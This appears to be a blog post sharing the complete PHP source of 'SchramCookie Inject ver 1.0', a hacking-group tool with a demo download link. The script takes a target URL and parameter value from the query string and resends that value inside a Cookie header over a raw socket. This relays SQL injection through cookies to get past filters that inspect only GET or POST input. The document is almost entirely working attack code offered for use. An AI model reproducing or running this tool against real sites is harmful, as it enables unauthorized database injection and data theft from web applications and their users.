SchramCookie Inject ver 1.0
<?php /*######################################################################### * / * * - >> SchramCookie Inject ver 1.0 * C0de by Nig3h -Greetz To All H3xIe Member. * link : xiaosan.cnblogs.com * ex : http://host/?url={$argv[0]}?id = variable; * *######################################################################### */ ini_set("max_execution_time", 0); $Current_Host = null; $Inj_Page = null; $Query_String = null; $Self = null; $Query_Value = null; if (empty($_GET["url"])) die("<h5>Please Enter Query_String.</h5>"); Auto_($_GET["url"], $_GET["id"]); function Printf_Info() { GlOBAL $Current_Host, $Inj_Page, $Query_String, $Self, $Query_Value; $Magic_Quotes_GPC_Bool = False; if (get_magic_quotes_gpc()) $Magic_Quotes_GPC_Bool = True; $GPC_Status = $Magic_Quotes_GPC_Bool == True?"On":"Off"; echo '<html>'."\n"; echo '<head><style type="text/css">'."\n"; echo 'body{background-color: #CCE8CF; Font-size:12px;}.Style{font-size:11px;}'."\n"; echo '</style></head>'."\n"; echo '<body>'."\n"; echo '<!-- Auth0r : Nig3h -->'."\n"; echo '<br />'."\n"; echo '<div align="center" class="Style">'; echo '$_SERVER[<Font Color="red">PHP_SELF</Font>] : '.$Self.'<br />'."\n"; echo 'HOST : '.$Current_Host.'<br />'."\n"; echo 'Magic_Quotes_GPC : '.'<strong>'.$GPC_Status.'</strong><br />'."\n"; echo 'Query_String : '.$Query_String.'<br />'."\n"; echo 'GET[ID]_Value : <strong><Font Color="Red">'.$Query_Value.'</Font></strong><br />'."\n"; echo 'Inject Page : '.$Inj_Page.'<br />'."\n"; echo 'Time : '.Date("M-D-Y").'<br />'."\n"; echo '<hr>'; echo '</div>'; echo '</body>'."\n"; echo '</html>'."\n"; } function Auto_($url, $id) { $url_len = strlen($url); $str_http = str_replace(chr(92), '//', strtolower(substr($url, 0, 7))); if ($str_http == 'http://') { $host = substr($url, 7, $url_len); } for ($i = 0; $i <= strlen($host); $i++) { if (($host[$i] == '/') or ($host[$i] == chr(92))) { $_Current_Host = substr($host, 0, $i); break; } } $Scr_Name = substr($host, $i, $url_len); $url_i = strlen($Scr_Name) + 1; $Scr_Begin = $i; for ($i = 0; $i < strlen($Scr_Name); $i++) { $url_i = $url_i - 1; if ($Scr_Name[$url_i] == '?') { $_Inj_Page = substr($Scr_Name, 0, $url_i); # sql_inject Page; break; } } GLOBAL $Query_String, $Current_Host, $Inj_Page, $Query_Value, $Self; $Query_String = substr($Scr_Name, $url_i+1, strpos($Scr_Name, '=') - $url_i -1); # Query_String; $Current_Host = $_Current_Host; $Inj_Page = $_Inj_Page; $Query_Value = $id; $Self = $_SERVER['PHP_SELF']; Printf_Info(); Ini_Main($Current_Host, $Inj_Page, $Query_String, $id); } function Ini_Main($Current_Host, $Inj_Page, $Query_String, $id) { # Config $Page_ID = $Query_String; $Host = $Current_Host; $Inj_Page = $Inj_Page; # END_CONFIG $inj_id = $id; $inj_id = str_replace("=", "%3D", $id); $inj_id = str_replace(" ", "%20", $inj_id); $Cookie_Str = "XUJUSPNGRWXKIXLMZRTR=NGQIVFESDSNWCEBNMJSJDEIAMQVQWZMKOLMOZRCG;"."$Page_ID=$inj_id"; //$Data_Str = "id= $id"; $_HTTP_SEND_rs = POST($Host, 80, $Inj_Page, $Data_Str, 1000, $Cookie_Str); echo $_HTTP_SEND_rs; } function Kill_Waste($str) { $str = strtolower($str); $str = str_replace('<script', '<!-- ', $str); $str = str_replace('</script', ' -->', $str); $str = str_replace('<style', '<!-- ', $str); $str = str_replace('</style', ' -->', $str); $str = str_replace('<head', '<!-- ', $str); $str = str_replace('</head', ' -->', $str); return $str; } function POST($host,$port,$path,$data,$timeout, $cookie='') { $buffer=''; $fp = fsockopen($host,$port,$errno,$errstr,$timeout); if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno); else { fputs($fp, "POST $path HTTP/1.0\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Cookie: $cookie\r\n"); fputs($fp, "Content-length: ".strlen($data)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data."\r\n\r\n"); $headers = ""; while ($str = trim(fgets($fp,4096))) $headers .= "$str\n"; while(!feof($fp)) { $buffer .= Kill_Waste(fgets($fp,4096)); } fclose($fp); } return $buffer; } ?>
Download demo:
https://files.cnblogs.com/xiaosan/SchramInj_demo.zip